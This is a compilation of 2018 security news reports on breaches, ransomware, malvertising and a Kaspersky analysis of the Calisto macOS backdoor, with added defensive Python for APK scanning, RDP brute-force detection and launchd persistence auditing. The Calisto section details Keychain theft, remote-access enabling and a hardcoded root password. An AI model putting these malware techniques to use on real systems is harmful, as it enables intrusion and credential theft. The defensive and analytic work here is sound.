Mozilla this week reaffirmed its commitment to distrust all Symantec certificates starting in late October 2018, when Firefox 63 is set to be released to the stable channel.

The browser maker had decided to remove trust in TLS/SSL certificates issued by the Certification Authority (CA) run by Symantec after a series of problems emerged regarding the wrongful issuance of such certificates.

Despite being one of the oldest and largest CAs, Symantec sold its certificate business to DigiCert after Internet companies, including Google and Mozilla, revealed plans to gradually remove trust in said certificates, even after DigiCert said it won’t repeat the same mistakes as Symantec.

The first step Mozilla took was to warn site owners about Symantec certificates issued before June 1, 2016, and encourage them to replace their TLS certificates.

Starting with Firefox 60, users see a warning when the browser encounters websites using certificates issued before June 1, 2016 that chain up to a Symantec root certificate.

According to Mozilla, less than 0.15% of websites were impacted by this change when Firefox 60 arrived in May. Most site owners were receptive and replaced their old certificates.

“The next phase of the consensus plan is to distrust any TLS certificate that chains up to a Symantec root, regardless of when it was issued […]. This change is scheduled for Firefox 63,” Mozilla’s Wayne Thayer notes in a blog post.

That browser release is currently planned for October 23, 2018 (it will arrive in Beta on September 5).

At the moment, around 3.5% of the top 1 million websites are still using Symantec certificates that will be impacted by the change. While the number is high, it represents a 20% improvement over the past two months, and Mozilla is confident that site owners will take action in due time.

“We strongly encourage website operators to replace any remaining Symantec TLS certificates immediately to avoid impacting their users as these certificates become distrusted in Firefox Nightly and Beta over the next few months,” Thayer concludes.

Google too is on track to distrust all Symantec certificates on October 23, 2018, when Chrome 70 is expected to land in the stable channel. Released in April, Chrome 66 has already removed trust in certificates issued by Symantec's legacy PKI before June 1, 2016.

DHS Unveils National Risk Management Center
1.8.2018 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of Homeland Security (DHS) has launched the National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, and General Paul M. Nakasone, Commander of U.S. Cyber Command and Director of the National Security Agency.

A live stream of the event can be watched online throughout the day.

Android Apps Carrying Windows Malware Yanked From Google Play
1.8.2018 securityweek   Android

Google recently removed 145 applications from Google Play after they were found to carry malicious Windows executables inside, Palo Alto Networks reveals.

Most of the infected applications, Palo Alto's researchers say, were uploaded to the application store between October and November 2017 and remained there for over half a year. Google removed all of them after being alerted to the issue.

While not representing a threat to the Android users who downloaded and installed them, the malicious code within these APKs is proof of the dangers posed by supply chain attacks: the software developers built these applications on compromised Windows systems.

Some of the infected Android applications had over 1000 downloads and 4-star ratings before being removed from Google Play.

The security researchers discovered that some of the infected APKs contained multiple malicious PE files at different locations, with different names. However, two malicious files were found embedded in most applications.

One of the files was present in 142 APKs, while the second had infected 21 APKs. The security firm also found 15 apps with both PE files inside, as well as some APKs with a number of other malicious PE files inside.

The researchers also note that one malicious PE file that infected most of the Android apps was a keylogger. The malicious program attempted to log keystrokes, including sensitive information like credit card numbers, social security numbers and passwords.

To appear legitimate, these files use fake names, including Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

When executed on Windows systems, the malicious PE files would create executable and hidden files in Windows system folders, including copies of themselves, modify the Windows registry to auto-start after a system restart, attempt to sleep for long periods of time, and also show suspicious network connection activity to an IP address via port 8829.

“Interestingly, we saw a mixture of infected and non-infected apps from the same developers. We believe the reason might be that developers used different development environment for different apps,” Palo Alto Networks says.

The malicious PE files cannot directly run on Android devices, but, if the APK is unpacked on a Windows machine and malicious code executed, the system becomes infected. As Palo Alto Networks points out, the situation could become much worse if the developers are infected with malicious files that can run on Android.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain,” the security firm concludes.
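The supply-chain problem described in this article (and in the conclusion of the earlier report above) is that a Windows infection on the developer's machine ends up packaged into the APK, and the dropped files carry innocuous names such as Android.exe or gallery.exe. A release pipeline can catch that before publication by inspecting archive entries by content rather than by name. The following is an added example, not Palo Alto Networks' tooling: it opens an APK as the ZIP archive it is and flags any entry that begins with a DOS header whose e_lfanew field points at the `PE\0\0` signature. The sample APK and the minimal, non-runnable PE stub inside it are constructed in memory for the example.

```python
"""Scan an APK for embedded Windows PE executables by content, not by name.

Added example (not Palo Alto Networks' code).  An APK is a ZIP archive,
so every entry is read and checked for the PE layout: 'MZ' at offset 0
and 'PE\\0\\0' at the 32-bit offset stored at 0x3C (e_lfanew).  A file
renamed to something harmless is still caught; a text file that happens
to carry a '.exe' name is not reported, because it contains no PE.
"""
import io
import struct
import zipfile


def looks_like_pe(data: bytes) -> bool:
    """True if `data` starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_apk(apk_bytes: bytes) -> list:
    """Return the names of archive entries that contain a PE executable."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if looks_like_pe(zf.read(info)):
                findings.append(info.filename)
    return findings


def build_pe_stub() -> bytes:
    """Constructed minimal PE header (not runnable): DOS header plus 'PE\\0\\0'."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew: PE signature right after DOS header
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


def build_sample_apk() -> bytes:
    """Constructed APK-like archive mixing normal entries with a smuggled PE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 32)
        zf.writestr("assets/gallery.exe", build_pe_stub())        # constructed: the dropped PE
        zf.writestr("res/raw/notes.txt", b"MZ " + b"x" * 80)       # 'MZ' prefix but no PE signature
        zf.writestr("assets/css.exe", b"plain text despite the name")  # suspicious name, no PE
    return buf.getvalue()


if __name__ == "__main__":
    print("PE entries found:", scan_apk(build_sample_apk()))
```

A build server would run `scan_apk` over every artifact before it is signed and uploaded, and fail the build on any finding; the names the article lists are only a hint, which is why the check keys on the header layout instead.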

Medical System Notifies 1.4M Patients About Computer Breach
1.8.2018 securityweek   Incident

A major Iowa hospital and medical clinic system has notified about 1.4 million patients and former patients about a computer breach that might have exposed their personal information.

UnityPoint Health officials say hackers broke into the company's email system and could have obtained medical information.

UnityPoint's privacy officer, RaeAnn Isaacson, said Monday the company isn't aware of any misuse of patient information related to the incident. But she says the company is telling patients what UnityPoint is doing to address the situation and what patients can do to help protect their information.

The company says the hackers also might have obtained some patients' financial information.

UnityPoint says that after the problem was discovered on May 31, it hired outside experts and notified the FBI.

SamSam Ransomware operators earned more than US$5.9 Million since late 2015
1.8.2018 securityaffairs 

Security experts from Sophos have published a report on the multimillion-dollar black market business of ransomware, using SamSam as a case study.

The researchers, who tracked the Bitcoin addresses managed by the crime gang, discovered that the crooks behind SamSam had extorted nearly $6 million from victims since December 2015, when the ransomware first appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015. 74% of the known victims are based in the United States. Other regions known to have suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million; the security firm also estimated that the group is netting around $300,000 per month.

“In total, we have now identified 157 unique addresses which have received ransom payments as well as 89 addresses which have been used on ransom notes and sample files but, to date, have not received payments,” continues the report published by Sophos.

“By analyzing the payments, and comparing this with ransom notes at the time, we can estimate the number of individual victims who have chosen to pay at least some of the ransom amount stands at 233 as of July 19th 2018. With an estimated 1 new victim being attacked each day, we believe that roughly 1 in 4 victims pay at least some of the ransom.”

Figure: SamSam ransomware payments

The attackers deploy the SamSam ransomware manually after compromising RDP on the target machine; this makes SamSam infections different from those of other ransomware families that rely on spam campaigns or malvertising.

The attackers carry out brute-force attacks against RDP on the target system; sometimes they use credentials obtained from other data breaches, typically offered for sale on the dark web.

Once a system inside the targeted organization is compromised, the SamSam operators search for other machines to infect while stealing credentials.

When the operators discover a potential target, they manually deploy SamSam using tools like PsExec and batch scripts.

The following diagram shows the different steps of the latest SamSam variant, for which the initial infection vector is still unclear.

Figure: SamSam new variant

Once they have infected the largest possible number of systems in the targeted organization, the operators offer a complete clean-up of the infected systems for a special price.

The highest figure seen so far has been US$850,000 worth of bitcoin for the decryption keys.

Thanks to a multi-tiered priority system, the encryption process targets the most valuable data first; SamSam does not encrypt Windows system-related files.

Since its discovery, SamSam has targeted large organizations, including hospitals and educational institutions.

Sophos provides the following recommendations to secure the network of organizations against the SamSam ransomware:

regularly patch known vulnerabilities in applications and operating systems;
keep regular backups;
use multi-factor authentication;
restrict access to RDP (on port 3389).
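Because SamSam's initial access is a manual RDP brute force, the failed-logon burst that precedes it is the most useful thing to alert on. The following is an added example (not code from the Sophos report) that runs a sliding-window brute-force check over constructed Windows Security log records; the pipe-separated record layout and the sample addresses are assumptions made for the example.

```python
"""Flag RDP brute-force activity of the kind SamSam operators rely on for initial access.

Added example, not code from the Sophos report. It scans Windows Security log records
for failed logons (Event ID 4625) on RDP sessions and alerts on a source address that
exceeds a failure threshold inside a sliding time window; a later successful logon
(Event ID 4624) from an alerted source is reported separately, since that is the
moment the operators would start their manual deployment. The record layout is a
constructed simplification of the real event fields.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records: timestamp|event_id|logon_type|account|source_ip
# Logon type 10 = RemoteInteractive (RDP). With Network Level Authentication enabled,
# a failed RDP credential check is logged with logon type 3 instead, so a production
# rule should also include type 3 failures that arrive through the RDP listener.
SAMPLE_LOG = """\
2018-07-19T02:00:01|4625|10|administrator|198.51.100.7
2018-07-19T02:00:03|4625|10|administrator|198.51.100.7
2018-07-19T02:00:05|4625|10|admin|198.51.100.7
2018-07-19T02:00:07|4625|3|admin|198.51.100.7
2018-07-19T02:00:09|4625|10|admin|198.51.100.7
2018-07-19T02:00:12|4625|10|backup|198.51.100.7
2018-07-19T02:00:15|4625|10|backup|198.51.100.7
2018-07-19T02:00:20|4624|10|backup|198.51.100.7
2018-07-19T02:10:00|4625|10|jsmith|203.0.113.9
2018-07-19T02:10:30|4625|10|jsmith|203.0.113.9
2018-07-19T02:11:00|4624|10|jsmith|203.0.113.9
"""


def parse_record(line):
    """Split one constructed record into its fields."""
    ts, event_id, logon_type, account, src = line.strip().split("|")
    return {"ts": datetime.fromisoformat(ts), "event_id": int(event_id),
            "logon_type": int(logon_type), "account": account, "src": src}


def detect_rdp_bruteforce(lines, threshold=5, window=timedelta(minutes=5),
                          rdp_logon_types=(10,)):
    """Return {source_ip: alert} for sources with >= threshold RDP failures in any window."""
    recent = defaultdict(deque)      # src -> timestamps of RDP failures inside the window
    total = defaultdict(int)         # src -> all RDP failures seen from that source
    accounts = defaultdict(set)      # src -> account names tried
    alerts = {}
    for line in lines:
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec["logon_type"] not in rdp_logon_types:
            continue                 # ignore console, service and network logons
        src = rec["src"]
        if rec["event_id"] == 4625:
            total[src] += 1
            accounts[src].add(rec["account"])
            q = recent[src]
            q.append(rec["ts"])
            while q and rec["ts"] - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold:
                alerts.setdefault(src, {"success_after_failures": None})
        elif rec["event_id"] == 4624 and src in alerts:
            # A successful RDP logon after a burst of failures: the password was likely guessed
            alerts[src]["success_after_failures"] = (rec["account"], rec["ts"])
    for src, alert in alerts.items():
        alert["failures"] = total[src]
        alert["accounts"] = accounts[src]
    return alerts


if __name__ == "__main__":
    for src, alert in detect_rdp_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(src, alert)
```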

Dixons Carphone Data Breach discovered in June affected 10 Million customers
1.8.2018 securityaffairs  Incident

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, far more than the initial estimate.
Dixons Carphone, one of the largest European consumer electronics and telecommunications retailers, suffered a major data breach in 2017, and new details about the incident have now been shared.

The situation was worse than initially thought: the company announced on Monday that the security breach affected around 10 million customers, far more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company; it promptly launched an investigation and hired an external firm to shed light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers last year, including their names, addresses and email addresses.
In June it was estimated that hackers had accessed the data of 1.2 million people and that 5.9 million payment cards used at Currys PC World and Dixons Travel had been exposed.

Dixons Carphone assured its customers that no financial data (PIN codes, card verification values and authentication data) was exposed.

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”


The company announced further security measures to protect its systems and confirmed that all necessary actions to lock out the attackers have been taken.
“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time the company has suffered a security breach; in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are in any case potentially exposed to phishing attacks and have to remain vigilant.

Ransomware attack against COSCO spread beyond its US network to Americas
1.8.2018 securityaffairs 

New revelations on the attack against COSCO confirm it was worse than initially thought, the ransomware spread beyond the US network.
Chinese shipping giant COSCO recently suffered a ransomware attack that disrupted some of the company's systems in the United States.

The shipping company quickly isolated the systems to avoid propagation to other regions and started an internal investigation; the firm confirmed that the incident did not affect the operations of the fleet.

“After the network security problem in the Americas has been detected, to protect the interests of our customers, we have taken proactive measures to isolate internal networks to carry out technical inspections on global scale.” COSCO said in an official statement. “With the reliable confirmation from the technical experts that the networks in all other regions are secure, the network applications were recovered at 16:00 (Beijing Time) on 25th July in all the regions except the Americas. As of now, all the business operations have been back to normal in the regions with network recovered.”

New revelations on the attack confirm it was worse than initially thought, the malicious code spread beyond the US network of the company and infected systems in other countries, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.

“Chinese shipping giant COSCO said a ransomware attack has spread beyond its US network to the broader Americas, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.” reported the CBR website.

“That’s according to maritime intelligence house Lloyds List, which has reported that customers were also said to be facing issues in the UK and Turkey.”

Due to the local network breakdown in the Americas region, local email and network telephony did not work properly at the time of the attack.

The attack on the world’s largest shipping company by dry weight tonnage has taken out emails and phones.

The company published a list of alternative Yahoo! email addresses to its customers for ordinary communications.

Security experts warned that the COSCO fleet could still be at risk following the attack.

“Although COSCO has been quick to respond to this hack, the virus may have been dormant for some time, so I would not be surprised if other systems – shore- and ship-based systems – have been breached. We strongly recommend to whoever discovered the attack to thoroughly verify the breach has been contained and has not infected any ships in the COSCO fleet.” Maritime cybersecurity specialists Naval Dome told IHS Fairplay.

The ransomware attack against COSCO doesn’t appear as severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to Maersk's second-quarter earnings report, the company expected losses between $200 million and $300 million due to “significant business interruption”, because it was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

Calisto Trojan for macOS

31.7.2018 Kaspersky Apple
The first member of the Proton malware family?
An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as a cover which is still relevant.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

Backdoor: unsigned. Intego Mac Internet Security 2018: signed by Intego.

It looks fairly convincing. The user is unlikely to notice the difference, especially if he has not used the app before.

As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from Intego’s — perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal when installing a program able to make changes to the system on macOS.

But after receiving the credentials, the program hangs slightly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan
With SIP enabled
Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using its child processes log and decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

Keychain storage data
Data extracted from the user login/password window
Information about the network connection
Data from Google Chrome: history, bookmarks, cookies

Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available
Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous section, but as the Trojan is not interrupted by SIP, it then:

Copies itself to /System/Library/ folder
Sets itself to launch automatically on startup
Unmounts and uninstalls its DMG image
Adds itself to Accessibility
Harvests additional information about the system
Enables remote access to the system
Forwards the harvested data to a C&C server

Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique on macOS, done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:

The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and an indicator of malicious activity for the antivirus. On the other hand, this method does not require user interaction.

An important feature of Calisto is getting remote access to the user system. To provide this, it:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one indication of the Trojan’s rawness.

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:

Attempt to contact the C&C server

Extra functions
Static analysis of Calisto revealed unfinished and unused additional functionality:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton
Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton sample was previously distributed under the guise of a Symantec antivirus product)
The Trojan sample contains the line “com.proton.calisto.plist”
Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain

Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software
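The persistence mechanism described above (a LaunchAgent plist pointing at a copy of the malware, with a hidden .calisto directory and, with SIP off, a copy under /System/Library/) is something an administrator can audit. The following is an added example, not Kaspersky's code: it parses launchd job plists with the standard library and flags the traits the analysis describes. The sample plists, paths and the label "com.proton.calisto" (inferred from the plist name the text quotes) are constructed for the example.

```python
"""Audit launchd job plists for Calisto-style persistence.

Added example, not Kaspersky's code. The analysis states that Calisto persists through
a .plist in /Library/LaunchAgents/ pointing at the malware, keeps its loot in a hidden
.calisto directory, copies itself into /System/Library/ when SIP is off and carries
the string "com.proton.calisto.plist". This audit flags jobs whose program sits in a
hidden dot-directory or under /System/Library, or whose label is on a known-bad list.
The sample plists and paths below are constructed.
"""
import plistlib
from pathlib import Path, PurePosixPath
from typing import List, Optional

# Label inferred from the plist name quoted in the analysis; extend from your own IoCs
KNOWN_BAD_LABELS = ("com.proton.calisto",)
# Third-party code never belongs here; it is writable only with SIP disabled
PROTECTED_PREFIXES = ("/System/Library/",)


def program_path(job: dict) -> Optional[str]:
    """Executable a launchd job runs: 'Program' if set, else ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments")
    return args[0] if args else None


def audit_launch_job(data: bytes) -> List[str]:
    """Findings for one plist; an empty list means nothing looked suspicious."""
    job = plistlib.loads(data)
    findings = []
    label = job.get("Label", "")
    if label in KNOWN_BAD_LABELS:
        findings.append(f"label {label!r} is a known Calisto/Proton label")
    path = program_path(job)
    if path is None:
        return findings + ["no Program or ProgramArguments: malformed job"]
    parts = PurePosixPath(path).parts
    if any(p.startswith(".") for p in parts[1:]):        # e.g. a .calisto directory
        findings.append(f"program {path!r} lives in a hidden directory")
    if path.startswith(PROTECTED_PREFIXES):
        findings.append(f"program {path!r} is under /System/Library (needs SIP disabled)")
    if findings and job.get("RunAtLoad"):
        findings.append("job has RunAtLoad set, so it starts at every login")
    return findings


def audit_directory(directory: str) -> dict:
    """Audit every *.plist in a launchd folder such as /Library/LaunchAgents."""
    results = {}
    for plist_file in sorted(Path(directory).glob("*.plist")):
        try:
            findings = audit_launch_job(plist_file.read_bytes())
        except (plistlib.InvalidFileException, ValueError) as exc:
            findings = [f"unparseable plist: {exc}"]
        if findings:
            results[plist_file.name] = findings
    return results


def _plist(label: str, program: str, run_at_load: bool = True) -> bytes:
    """Build a constructed XML plist for the samples below."""
    return plistlib.dumps({"Label": label, "ProgramArguments": [program],
                           "RunAtLoad": run_at_load})


# Constructed samples: a Calisto-like job, a job hiding in a dot-directory, a benign one
SAMPLE_CALISTO_LIKE = _plist("com.proton.calisto", "/System/Library/.calisto/helper")
SAMPLE_HIDDEN_DIR = _plist("com.example.sync", "/Users/alice/.sync-helper/run")
SAMPLE_BENIGN = _plist("com.example.updater",
                       "/Applications/Example.app/Contents/MacOS/updater")

if __name__ == "__main__":
    for name, sample in (("calisto-like", SAMPLE_CALISTO_LIKE),
                         ("hidden-dir", SAMPLE_HIDDEN_DIR), ("benign", SAMPLE_BENIGN)):
        print(name, audit_launch_job(sample))
```

On a live machine, `audit_directory("/Library/LaunchAgents")` and the same call for `~/Library/LaunchAgents` and `/Library/LaunchDaemons` cover the usual persistence folders.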

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d

Advanced Malvertising Campaign Exploits Online Advertising Supply Chain
31.7.2018 securityweek
Exploit  Virus

Malvertising Campaign Steals Traffic From 10,000 Hacked WordPress Sites and Exploits the Online Advertising Supply Chain

Malvertising is neither a new nor an insignificant threat -- nor is there any easy solution to stop it. It is the abuse of the online advertising industry to deliver malware disguised as or hidden within seemingly innocuous advertisements.

Researchers at Check Point have discovered what they describe as the infrastructure and methods used in a large ‘malvertising’ and banking Trojan campaign, which delivers malicious adverts to millions worldwide through the HiBids online advertising platform.

The campaign starts with a threat actor that Check Point describes as 'Master134'. He sold stolen web traffic from 10,000 hacked WordPress sites to, say the researchers, "AdsTerra, the real time bidding (RTB) ad platform, who then sold it to Resellers (ExoClick, AdKernel, EvoLeads and AdventureFeeds)."

The researchers told SecurityWeek, "The traffic is stolen from the compromised WordPress sites via a known exploit on that platform, which enables the actor to insert a redirection to his malicious infrastructure."

Once this traffic has passed through AdsTerra, the resellers sell it to the highest bidding advertiser. Unfortunately, the return on malware distribution is (almost) immediate for malware such as ransomware, miners, and banking trojans. Because of that large return, malicious actors can usually afford to out-bid legitimate publishers.

"In this way," say the researchers, "cyber criminals are abusing the online advertising ecosystem, using it to bid alongside legitimate advertisers, like Nike or Coca Cola, but placing higher bids in order to have the ad-networks select their malware-laden ads to display on thousands of publishers’ websites instead of clean, legitimate ads."

Check Point does not provide details of the malware being distributed through this particular campaign, nor any of the publications that receive and unwittingly transmit the malware to innocent visitors. It merely states, "The ads often contain malicious code that exploits unpatched vulnerabilities in browsers or browser plug-ins, such as Adobe’s Flash Player, so that the user gets infected by ransomware, keyloggers, and other types of malware simply by visiting a site hosting the malicious link."

Luis Corrons, security evangelist at Avast, told SecurityWeek that past malvertising campaigns "have affected some of the biggest news sites, such as The New York Times, Huffington Post, Forbes, The Daily Mail and more. In order to go undetected, some of these attacks just last a few seconds each wave, to make it harder to track the source of the infection. JavaScript Monero miner even got to YouTube through an ad network last January."

SecurityWeek asked AdsTerra for a comment on malvertising and the Check Point report, but we have so far received no reply to our email. Of the two telephone numbers we were able to find, one is a mobile number (supposedly in Singapore) that was switched off, while the other (supposedly in Gibraltar) just terminated. AdsTerra, according to its website, is headquartered in Limassol, Cyprus; while Europages lists an address in Gibraltar.

Online advertiser reviews, however, provide a glowing endorsement for the organization; with one saying that AdsTerra is particularly strong on popunder adverts. Popunders are among the sneakiest of advertisements. Rather than run the risk of being closed by the user as soon as it is seen, popunders open in a new window underneath the current browser window and remain unseen until the focus window is closed. "That’s one of the main streams of malvertising," Check Point told SecurityWeek.

There is no easy defense against malvertising. Ad blockers work, but more and more publishers are blocking access to their pages when they detect a blocker. Users must either pay a subscription for no adverts, accept they cannot view the page they want, or receive the adverts that could potentially contain malware or malicious links.

Greater responsibility -- perhaps even legal liability -- on the advertiser would help. Corrons suggests, "A content check should be performed by the ad network (on both the advertisements and the landing pages)." He would also like to see greater active monitoring, background checking on the publishers, and legal contracts with high fines if the content is not secure.

Little of this currently happens. "Due to the really fast transactions, and the sheer volume of advertisements, we believe that there is no real-time monitoring by humans," Check Point told SecurityWeek. "Resellers need to know that their customers are 'bad guys', but most of them perform no vetting of their customers."

Trusting to luck is not a good security defense; but it seems that the most many users can do against malvertising is use an ad blocker, maintain an up-to-date anti-virus solution, minimize local vulnerabilities with judicious patching -- and trust to luck when all else fails.

Samsung Patches Critical Vulnerabilities in SmartThings Hub

31.7.2018 securityweek Vulnerebility

Samsung has patched a series of critical vulnerabilities in its SmartThings Hub, which could be exploited to execute OS commands or other arbitrary code on vulnerable devices.

Designed as a central controller, the SmartThings Hub allows users to monitor and manage smart home devices such as smart plugs, LED light bulbs, thermostats, cameras, and more. The controller runs a Linux-based firmware that communicates with Internet of Things devices deployed in the home over Ethernet, Zigbee, Z-Wave and Bluetooth.

An attacker able to leverage the discovered vulnerabilities could access sensitive information gathered by the connected devices, monitor and control devices within the home, and perform unauthorized activities. They could also unlock homes, monitor users via cameras inside homes, disable motion detectors, and even cause physical damage to appliances.

A total of 20 vulnerabilities impacting the SmartThings Hub were discovered by Talos researchers, who reveal that an attacker could “chain together three vulnerability classes that are present in the device to gain complete control of the device.” In a blog post, the researchers also describe different attack vectors an actor looking to exploit these vulnerability chains could use.

The vulnerabilities were found in the Samsung SmartThings Hub STH-ETH-250 running firmware version 0.20.17. Samsung has already released patches for all flaws, and users are advised to make sure their devices are updated to stay secure (Samsung pushes the updates automatically, so user interaction should not be necessary).

A new sophisticated version of the AZORult Spyware appeared in the wild

31.7.2018 securityaffairs Virus

A new sophisticated version of the AZORult Spyware was spotted in the wild, it was involved in a large email campaign on July 18
Malware researchers at Proofpoint spotted a new version of the AZORult spyware in the wild; it was involved in a large email campaign on July 18, just 24 hours after it appeared on cybercrime forums on the Dark Web.

Attackers sent out thousands of messages targeting North America. The messages used employment-related subjects such as “About a role” and “Job Application,” while the malicious attached documents used file names in the format of “firstname.surname_resume.doc”.

“AZORult is a robust information stealer & downloader that Proofpoint researchers originally identified in 2016 as part of a secondary infection via the Chthonic banking Trojan. We have since observed many instances of AZORult dropped via exploit kits and in fairly regular email campaigns as both a primary and secondary payload.” reads the analysis published by ProofPoint.

“Recently, AZORult authors released a substantially updated version, improving both on its stealer and downloader functionality.”


AZORult is a data stealer first spotted in 2016 by Proofpoint, which discovered it as part of a secondary infection via the Chthonic banking trojan. It was later involved in many malspam attacks, but only now have the authors released a substantially updated variant.

The latest version appears more sophisticated than previous ones: it can steal browsing history from browsers (except IE and Edge), it includes a conditional loader that checks certain parameters before running the malicious code, and it supports the Exodus, Jaxx, Mist, Ethereum, Electrum and Electrum-LTC cryptocurrency wallets.

Below is the full change log:

UPD v3.2
[+] Added stealing of history from browsers (except IE and Edge)
